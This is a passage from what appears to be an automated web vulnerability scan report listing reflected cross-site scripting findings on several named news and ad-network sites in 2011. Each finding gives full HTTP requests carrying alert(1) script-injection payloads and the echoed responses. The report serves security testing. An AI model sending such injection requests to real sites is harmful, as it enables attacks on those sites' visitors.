Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwIAAAEv1X7mIwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: application/x-javascript;charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:34 GMT
Age: 0
Connection: keep-alive
Content-Length: 16389


/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */
try{if('undefined'==typeof $iTXT){var $iTXT={};}$iTXT.door={}
...[SNIP]...
omponent(tTXT.replace(/\n/,' ')); while (p.ttxt.indexOf('\'')>-1) p.ttxt=p.ttxt.replace('\'', '%27');p.auat=0;p.lpgv=1;p.ddate=dDate;p.pvu=gPVU;p.pvm=gPVM;p.forcedb=0;p.seid=gSEID;p.unrm=false;p.sest='dc566\\';alert(1)//64a63b57b65';p.ru=encodeURIComponent(sRU);cAs(server,p);} else if (gCL){if(((gITXTN!=null&&gITXTN.length)||(gITXTNi!=null&&gITXTNi.length))&&gCL>
...[SNIP]...
2.81. http://www.polls.newsvine.com/_api/comments/getComments [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_api/comments/getComments

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 3050f<script>alert(1)</script>18f8d8f456f was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_api/comments/getComments?n=10&u=http%3A%2F%2Ftoday.msnbc.msn.com%2Fid%2F42953716%2F&t=humor%2Cbooks%2Ctoday&jsoncallback=commentdata3050f<script>alert(1)</script>18f8d8f456f HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=0cee624861ff357c85817cc52b48f039

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 373
Content-Type: application/json
Cache-Control: max-age=300
Expires: Mon, 09 May 2011 16:08:49 GMT
Date: Mon, 09 May 2011 16:03:49 GMT
Connection: close

           
commentdata3050f<script>alert(1)</script>18f8d8f456f({"response":{"article":[{"url":"http:\/\/today.polls.newsvine.com\/_news\/2011\/05\/09\/6611143-chelsea-handlers-victims-get-their-turn","headline":"Chelsea Handler's victims get their turn","leadin":
...[SNIP]...
2.82. http://www.publishersweekly.com/pw/ajax.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/ajax.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65273<script>alert(1)</script>d9fb1b41341882372 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /pw/65273<script>alert(1)</script>d9fb1b41341882372?proc=mark_popular&article=47134 HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
Referer: http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html
Origin: http://www.publishersweekly.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=231239710.1304956960.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=231239710.467890405.1304956960.1304956960.1304956960.1; __utmc=231239710; __utmb=231239710.1.10.1304956960; __gads=ID=c2c959c0854368ab:T=1304956962:S=ALNI_MaVPyM7_AF7bXlkSyUbZOyeke88aw

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:29 GMT
X-Varnish: 441693821
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 402

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/65273<script>alert(1)</script>d9fb1b41341882372</TITLE>
<META NAME="ROBOTS" content="NO
...[SNIP]...
</HEAD>
layout for /65273<script>alert(1)</script>d9fb1b41341882372 was not found


<!-- this page was generated by the Iowa(tm) Content Management System by Mediapolis(tm), inc. -->
...[SNIP]...
2.83. http://www.publishersweekly.com/pw/ajax.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/ajax.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload bc00f</title><script>alert(1)</script>ec28f08f4de88aceb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /pw/bc00f</title><script>alert(1)</script>ec28f08f4de88aceb?proc=mark_popular&article=47134 HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
Referer: http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html
Origin: http://www.publishersweekly.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=231239710.1304956960.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=231239710.467890405.1304956960.1304956960.1304956960.1; __utmc=231239710; __utmb=231239710.1.10.1304956960; __gads=ID=c2c959c0854368ab:T=1304956962:S=ALNI_MaVPyM7_AF7bXlkSyUbZOyeke88aw

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:33 GMT
X-Varnish: 441694122
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 418

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/bc00f</title><script>alert(1)</script>ec28f08f4de88aceb</TITLE>
<META NAME="ROBOTS" con
...[SNIP]...
2.84. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66b05<script>alert(1)</script>86589435ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pw/by-topic66b05<script>alert(1)</script>86589435ba/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:09 GMT
X-Varnish: 441692548
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/by-topic66b05<script>alert(1)</script>86589435ba/book-news/page-to-screen/article/47134
...[SNIP]...
</HEAD>
layout for /by-topic66b05<script>alert(1)</script>86589435ba/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html was not found


<!-- this page was generated by the Iowa(tm) Content Management System by Me
...[SNIP]...
2.85. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 18327</title><script>alert(1)</script>763a940e35b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pw/by-topic18327</title><script>alert(1)</script>763a940e35b/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:12 GMT
X-Varnish: 441692804
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 638

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/by-topic18327</title><script>alert(1)</script>763a940e35b/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html</TITLE>
...[SNIP]...
2.86. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1e6e6<script>alert(1)</script>60df9f52946 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pw/by-topic/book-news/page-to-screen/article1e6e6<script>alert(1)</script>60df9f52946/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:33 GMT
X-Varnish: 441694139
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/by-topic/book-news/page-to-screen/article1e6e6<script>alert(1)</script>60df9f52946/4713
...[SNIP]...
</HEAD>
layout for /by-topic/book-news/page-to-screen/article1e6e6<script>alert(1)</script>60df9f52946/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html was not found


<!-- this page was generated by the Iowa(tm) Content Management System by Mediapolis(tm), inc. -->
...[SNIP]...
2.87. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 4703b</title><script>alert(1)</script>347f9ca127f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pw/by-topic/book-news/page-to-screen/article4703b</title><script>alert(1)</script>347f9ca127f/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:37 GMT
X-Varnish: 441694317
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 638

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/by-topic/book-news/page-to-screen/article4703b</title><script>alert(1)</script>347f9ca127f/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html</TITLE>
...[SNIP]...
2.88. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 13457</title><script>alert(1)</script>069dc24f0c2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html13457</title><script>alert(1)</script>069dc24f0c2 HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:42 GMT
X-Varnish: 441694546
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 638

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html13457</title><script>alert(1)</script>069dc24f0c2</TITLE>
...[SNIP]...
2.89. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishersweekly.com
Path:   /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 434dd<script>alert(1)</script>d35c3f7de24 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html434dd<script>alert(1)</script>d35c3f7de24 HTTP/1.1
Host: www.publishersweekly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
Cache-Control: max-age=3600
Status: 404
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:39 GMT
X-Varnish: 441694409
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chels
...[SNIP]...
</HEAD>
layout for /by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html434dd<script>alert(1)</script>d35c3f7de24 was not found


<!-- this page was generated by the Iowa(tm) Content Management System by Mediapolis(tm), inc. -->
...[SNIP]...
2.90. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_ent

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feef7'%3balert(1)//7c3e7a3ab5b was submitted in the cli cookie. This input was echoed as feef7';alert(1)//7c3e7a3ab5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/be_ent;sz=728x90;net=q1;ord=957008422;ord1=89470;cmpgurl=http%253A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%253Fodyssey%253Dmod%25257Cnewswell%25257Ctext%25257CHome%25257Cs? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989efeef7'%3balert(1)//7c3e7a3ab5b; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:35 GMT
Connection: close
Content-Length: 7244

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-55689212_1304957015","http://ad.doubleclick.net/adj/q1.q.gc.6008/be_ent;net=q1;u=,q1-55689212_1304957015,11f8f328940989efeef7';alert(1)//7c3e7a3ab5b,ent,am.h-am.b;;sz=728x90;net=q1;ord1=89470;contx=ent;dc=w;btg=am.h;btg=am.b;ord=957008422?","728","90",false);</scr'+'ipt>
...[SNIP]...
2.91. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_life

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f6c9'%3balert(1)//9a6c2150542 was submitted in the cli cookie. This input was echoed as 1f6c9';alert(1)//9a6c2150542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/be_life;sz=728x90;net=q1;ord=957064653;ord1=489085;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e1f6c9'%3balert(1)//9a6c2150542; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:41 GMT
Connection: close
Content-Length: 7248

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-26682929_1304957081","http://ad.doubleclick.net/adj/q1.q.gc.6008/be_life;net=q1;u=,q1-26682929_1304957081,11f8f328940989e1f6c9';alert(1)//9a6c2150542,food,am.h-am.b;;sz=728x90;net=q1;ord1=489085;contx=food;dc=w;btg=am.h;btg=am.b;ord=957064653?","728","90",false);</scr'+'ipt>
...[SNIP]...
2.92. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/life

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eae2d'%3balert(1)//4c8cc42803f was submitted in the cli cookie. This input was echoed as eae2d';alert(1)//4c8cc42803f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/life;sz=728x90;net=q1;ord=957049792;ord1=491627;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989eeae2d'%3balert(1)//4c8cc42803f; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:29 GMT
Connection: close
Content-Length: 7245

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-53639543_1304957069","http://ad.doubleclick.net/adj/q1.q.gc.6008/life;net=q1;u=,q1-53639543_1304957069,11f8f328940989eeae2d';alert(1)//4c8cc42803f,food,am.h-am.b;;sz=728x90;net=q1;ord1=491627;contx=food;dc=w;btg=am.h;btg=am.b;ord=957049792?","728","90",false);</scr'+'ipt>
...[SNIP]...
2.93. http://optimized-by.rubiconproject.com/a/7476/12017/24449-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7476/12017/24449-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4375"-alert(1)-"6fff19ba843 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

